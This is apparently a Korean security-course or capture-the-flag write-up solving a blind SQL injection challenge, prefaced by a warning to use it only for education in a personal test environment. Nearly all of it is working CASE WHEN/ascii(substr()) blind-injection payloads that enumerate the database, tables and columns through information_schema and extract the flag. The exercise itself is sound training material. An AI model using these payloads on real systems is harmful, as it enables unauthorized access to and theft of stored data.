8 주차 SQL injection 데이터 추출 문제 풀이(3)
1. 8 주차 SQL injection 데이터 추출 문제 풀이(3)
※ 주의 사항 :
1. 교육 목적으로만 이용 해주세요.
2. 무단 침입, 데이터 유출, 개인 정보 침해 등 불법적인 활동은 심각한 법적 결과를 초래할 수 있습니다.
3. 개인적인 테스트 환경을 구축해서 실습하시길 바랍니다.
1.1 SQLi Point 3 문제
1.1.1 sql injection 포인트 찾기
1.1.2 select 문구가 사용가능한 지 체크
1.1.3 공격 format 만들기
case when (ascii(substr((select ~~),1,1))>0) then 1 else (select 1 union select 2) end
1.1.4 DB이름 확인하기
case when (ascii(substr((select database() limit 0,1),1,1))>0) then 1 else (select 1 union select 2) end
sqli_8
1.1.5 table이름 확인하기
select table_name from information_schema.tables where table_schema=’sqli_8’ limit 0,1
case when (ascii(substr((select table_name from information_schema.tables where table_schema=’sqli_8’ limit 0,1),1,1))>0) then 1 else (select 1 union select 2) end
flag_Table
1.1.6 column 이름 확인하기
select column_name from information_schema.columns where table_name=’flag_Table’ limit 0,1
case when (ascii(substr((select column_name from information_schema.columns where table_name=’flag_Table’ limit 0,1),1,1))>0) then 1 else (select 1 union select 2) end
flagData
1.1.7 data 추출하기
select flagData from flag_Table limit 0,1
case when (ascii(substr((select flagData from flag_Table limit 0,1 ),1,1))>0) then 1 else (select 1 union select 2) end
segfault{~~}
댓글남기기